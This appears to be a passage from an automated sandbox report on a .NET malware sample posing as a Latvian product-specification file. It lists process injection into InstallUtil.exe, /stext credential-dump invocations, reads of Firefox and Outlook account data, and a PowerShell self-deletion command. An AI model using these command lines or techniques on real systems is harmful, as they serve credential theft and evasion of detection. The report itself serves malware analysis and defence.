Code function: 6_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

6_2_0041A225

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00416C9D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		3_2_00416C9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		9_2_00410DE1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 6_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

6_2_0041A6AF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0040E2F1 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

3_2_0040E2F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0041A84A FindResourceA,LoadResource,LockResource,SizeofResource,

3_2_0041A84A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_00419DBA

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RRTJVV

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yv0p3uq0.snl.ps1

Jump to behavior

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: InstallUtil.exe, InstallUtil.exe, 00000008.00000002.1506892880.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: InstallUtil.exe, 00000006.00000002.1514558399.0000000001310000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Virustotal: Detection: 27%
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	ReversingLabs: Detection: 21%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe "C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe"
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\wwygbptuchcdfblksmaltqitnujxaycgq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\yyezc"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\yyezc"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\isrjdappm"
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe' -Force	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\wwygbptuchcdfblksmaltqitnujxaycgq"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\yyezc"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\yyezc"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\isrjdappm"	Jump to behavior

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1515224876.0000000006780000.00000004.08000000.00040000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000004095000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1515224876.0000000006780000.00000004.08000000.00040000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000004095000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, Rlwjjjxx.cs	.Net Code: Clrrna System.AppDomain.Load(byte[])
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6180000.6.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6180000.6.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6180000.6.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6180000.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6180000.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
